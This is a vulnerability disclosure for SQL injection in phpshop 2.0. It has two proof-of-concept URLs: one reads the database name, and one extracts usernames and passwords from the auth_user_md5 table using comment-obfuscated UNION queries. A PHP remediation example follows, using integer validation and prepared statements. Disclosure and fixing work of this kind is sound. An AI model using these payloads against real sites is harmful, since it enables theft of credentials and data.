Title : phpshop 2.0 SQL Injection Vulnerability
Author : By onestree
Download : http://code.google.com/p/phpshop/downloads/list
Tested on : windows 7 / ubuntu

SQLi p0c:
==================

http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

Fix:
Strengthen input filtering
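
One way to apply that filtering to the numeric id parameters shown above (module_id, product_id), as an added example that is not phpshop's own code: the id is accepted only if it parses as a positive integer, and the query uses a bound parameter. The function names, the `product` table and its columns, and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
// Added example, not phpshop code. Table and column names are assumptions.
declare(strict_types=1);

// Accept an id parameter only if it is a plain positive integer.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing, or an array such as product_id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look up a product with a bound parameter; the value never becomes SQL text.
function find_product(PDO $db, int $productId): ?array
{
    $stmt = $db->prepare('SELECT product_id, product_name FROM product WHERE product_id = :id');
    $stmt->bindValue(':id', $productId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (product_id INTEGER PRIMARY KEY, product_name TEXT)');
$db->exec("INSERT INTO product VALUES (1087, 'sample item')");

// Constructed request values: one legitimate, one shaped like the PoC above.
$samples = ['1087', "1087'/**/union/**/select/**/1--"];
foreach ($samples as $raw) {
    $id = parse_id($raw);
    if ($id === null) {
        echo "rejected: ", $raw, PHP_EOL; // a real handler would answer HTTP 400 here
        continue;
    }
    $row = find_product($db, $id);
    echo "accepted: ", $raw, " -> ", $row === null ? 'not found' : $row['product_name'], PHP_EOL;
}
```

Validation alone covers these two integer parameters; the bound parameter is what keeps the query safe if a later change loosens or bypasses the validation.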